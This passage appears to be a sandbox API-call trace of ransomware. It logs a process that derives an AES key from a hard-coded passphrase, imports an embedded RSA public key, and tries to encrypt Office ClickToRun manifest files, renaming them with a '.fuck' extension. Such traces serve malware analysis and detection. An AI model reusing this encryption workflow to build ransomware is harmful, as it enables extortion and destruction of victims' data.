hTemplateFile=0x0) returned 0xffffffff [0236.101] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0236.102] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x27fecc0) returned 1 [0236.111] CryptCreateHash (in: hProv=0x27fecc0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0236.111] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.111] CryptHashData (hHash=0x27eb8a0, pbData=0x2ecb20, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.111] CryptDeriveKey (in: hProv=0x27fecc0, Algid=0x6610, hBaseData=0x27eb8a0, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x27ebce0) returned 1 [0236.112] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.112] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0236.112] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x27fe990) returned 1 [0236.114] CryptImportPublicKeyInfo (in: hCryptProv=0x27fe990, dwCertEncodingType=0x1, pInfo=0x27f73d8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27f7408*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27f7410*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x27eb6e0) returned 1 [0236.114] CryptEncrypt (in: hKey=0x27eb6e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0236.115] CryptEncrypt (in: hKey=0x27eb6e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27ff650*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x27ff650*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0236.115] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27ff650, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.115] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2804868, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x2804868, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0236.115] CryptEncrypt (in: hKey=0x27ebce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2804868*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x2804868*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0236.115] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2804868, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.115] CloseHandle (hObject=0xffffffff) returned 1 [0236.115] CloseHandle (hObject=0xffffffff) returned 1 [0236.115] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmmui.msi.16.en-us.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmmui.msi.16.en-us.xml"), bFailIfExists=0) returned 0 [0236.115] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml", dwFileAttributes=0x0) returned 0 [0236.116] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmmui.msi.16.en-us.xml.gsg")) returned 0 [0236.116] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmmui.msi.16.en-us.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmmui.msi.16.en-us.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmmui.msi.16.en-us.xml.fuck")) returned 0 [0236.116] CryptDestroyHash (hHash=0x27eb8a0) returned 1 [0236.116] CryptDestroyKey (hKey=0x27ebce0) returned 1 [0236.116] CryptReleaseContext (hProv=0x27fecc0, dwFlags=0x0) returned 1 [0236.116] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.117] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0236.117] GetLastError () returned 0x5 [0236.117] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmux.osmux.x-none.msi.16.x-none.xml")) returned 0x20 [0236.119] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml", dwFileAttributes=0x80) returned 0 [0236.120] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmux.osmux.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.120] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmux.osmux.x-none.msi.16.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.120] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml.gsg", dwFileAttributes=0x2) returned 0 [0236.121] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x27feb28) returned 1 [0236.130] CryptCreateHash (in: hProv=0x27feb28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0236.130] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.130] CryptHashData (hHash=0x27eb8a0, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.130] CryptDeriveKey (in: hProv=0x27feb28, Algid=0x6610, hBaseData=0x27eb8a0, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x27ebc60) returned 1 [0236.130] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.130] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0236.130] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x27feee0) returned 1 [0236.133] CryptImportPublicKeyInfo (in: hCryptProv=0x27feee0, dwCertEncodingType=0x1, pInfo=0x27f74a8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27f74d8*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27f74e0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x27eb720) returned 1 [0236.133] CryptEncrypt (in: hKey=0x27eb720, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0236.133] CryptEncrypt (in: hKey=0x27eb720, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27feff0*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x27feff0*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0236.133] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27feff0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.133] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2804868, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x2804868, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0236.133] CryptEncrypt (in: hKey=0x27ebc60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2804868*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x2804868*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0236.133] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2804868, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.133] CloseHandle (hObject=0xffffffff) returned 1 [0236.133] CloseHandle (hObject=0xffffffff) returned 1 [0236.134] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmux.osmux.x-none.msi.16.x-none.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmux.osmux.x-none.msi.16.x-none.xml"), bFailIfExists=0) returned 0 [0236.134] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml", dwFileAttributes=0x0) returned 0 [0236.134] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmux.osmux.x-none.msi.16.x-none.xml.gsg")) returned 0 [0236.134] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmux.osmux.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OSMUX.OSMUX.x-none.msi.16.x-none.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmux.osmux.x-none.msi.16.x-none.xml.fuck")) returned 0 [0236.135] CryptDestroyHash (hHash=0x27eb8a0) returned 1 [0236.135] CryptDestroyKey (hKey=0x27ebc60) returned 1 [0236.135] CryptReleaseContext (hProv=0x27feb28, dwFlags=0x0) returned 1 [0236.135] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.135] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0236.135] GetLastError () returned 0x5 [0236.135] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmuxmui.msi.16.en-us.xml")) returned 0x20 [0236.135] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml", dwFileAttributes=0x80) returned 0 [0236.136] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmuxmui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.136] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmuxmui.msi.16.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.136] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0236.137] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x27feb28) returned 1 [0236.146] CryptCreateHash (in: hProv=0x27feb28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0236.146] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.146] CryptHashData (hHash=0x27ebc60, pbData=0x2ecb20, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.146] CryptDeriveKey (in: hProv=0x27feb28, Algid=0x6610, hBaseData=0x27ebc60, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x27ebce0) returned 1 [0236.146] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.146] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0236.146] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x27fecc0) returned 1 [0236.149] CryptImportPublicKeyInfo (in: hCryptProv=0x27fecc0, dwCertEncodingType=0x1, pInfo=0x27f77e8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x27f7818*, PublicKey.cbData=0x8c, PublicKey.pbData=0x27f7820*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x27eb7a0) returned 1 [0236.150] CryptEncrypt (in: hKey=0x27eb7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0236.150] CryptEncrypt (in: hKey=0x27eb7a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27ff6d8*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x27ff6d8*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0236.150] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27ff6d8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.150] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279bf90, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x279bf90, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0236.150] CryptEncrypt (in: hKey=0x27ebce0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279bf90*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x279bf90*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0236.150] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279bf90, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0236.151] CloseHandle (hObject=0xffffffff) returned 1 [0236.151] CloseHandle (hObject=0xffffffff) returned 1 [0236.151] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmuxmui.msi.16.en-us.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmuxmui.msi.16.en-us.xml"), bFailIfExists=0) returned 0 [0236.152] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml", dwFileAttributes=0x0) returned 0 [0236.152] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmuxmui.msi.16.en-us.xml.gsg")) returned 0 [0236.153] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmuxmui.msi.16.en-us.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.osmuxmui.msi.16.en-us.xml.fuck" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.osmuxmui.msi.16.en-us.xml.fuck")) returned 0 [0236.153] CryptDestroyHash (hHash=0x27ebc60) returned 1 [0236.153] CryptDestroyKey (hKey=0x27ebce0) returned 1 [0236.153] CryptReleaseContext (hProv=0x27feb28, dwFlags=0x0) returned 1 [0236.153] FindNextFileA (in: hFindFile=0x27ebc20, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.164] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0236.164] GetLastError () returned 0x5 [0236.164] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlook.outlook.x-none.msi.16.x-none.xml")) returned 0x20 [0236.164] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml", dwFileAttributes=0x80) returned 0 [0236.164] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlook.outlook.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.165] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.outlook.outlook.x-none.msi.16.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.165] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml.gsg", dwFileAttributes=0x2) returned 0 [0236.165] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x27ff100) returned 1 [0236.180] CryptCreateHash (in: hProv=0x27ff100, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0236.180] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.180] CryptHashData (hHash=0x27eb8a0, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.180] CryptDeriveKey (in: hProv=0x27ff100, Algid=0x6610, hBaseData=0x27eb8a0, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x27ebce0) returned 1 [0236.180] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 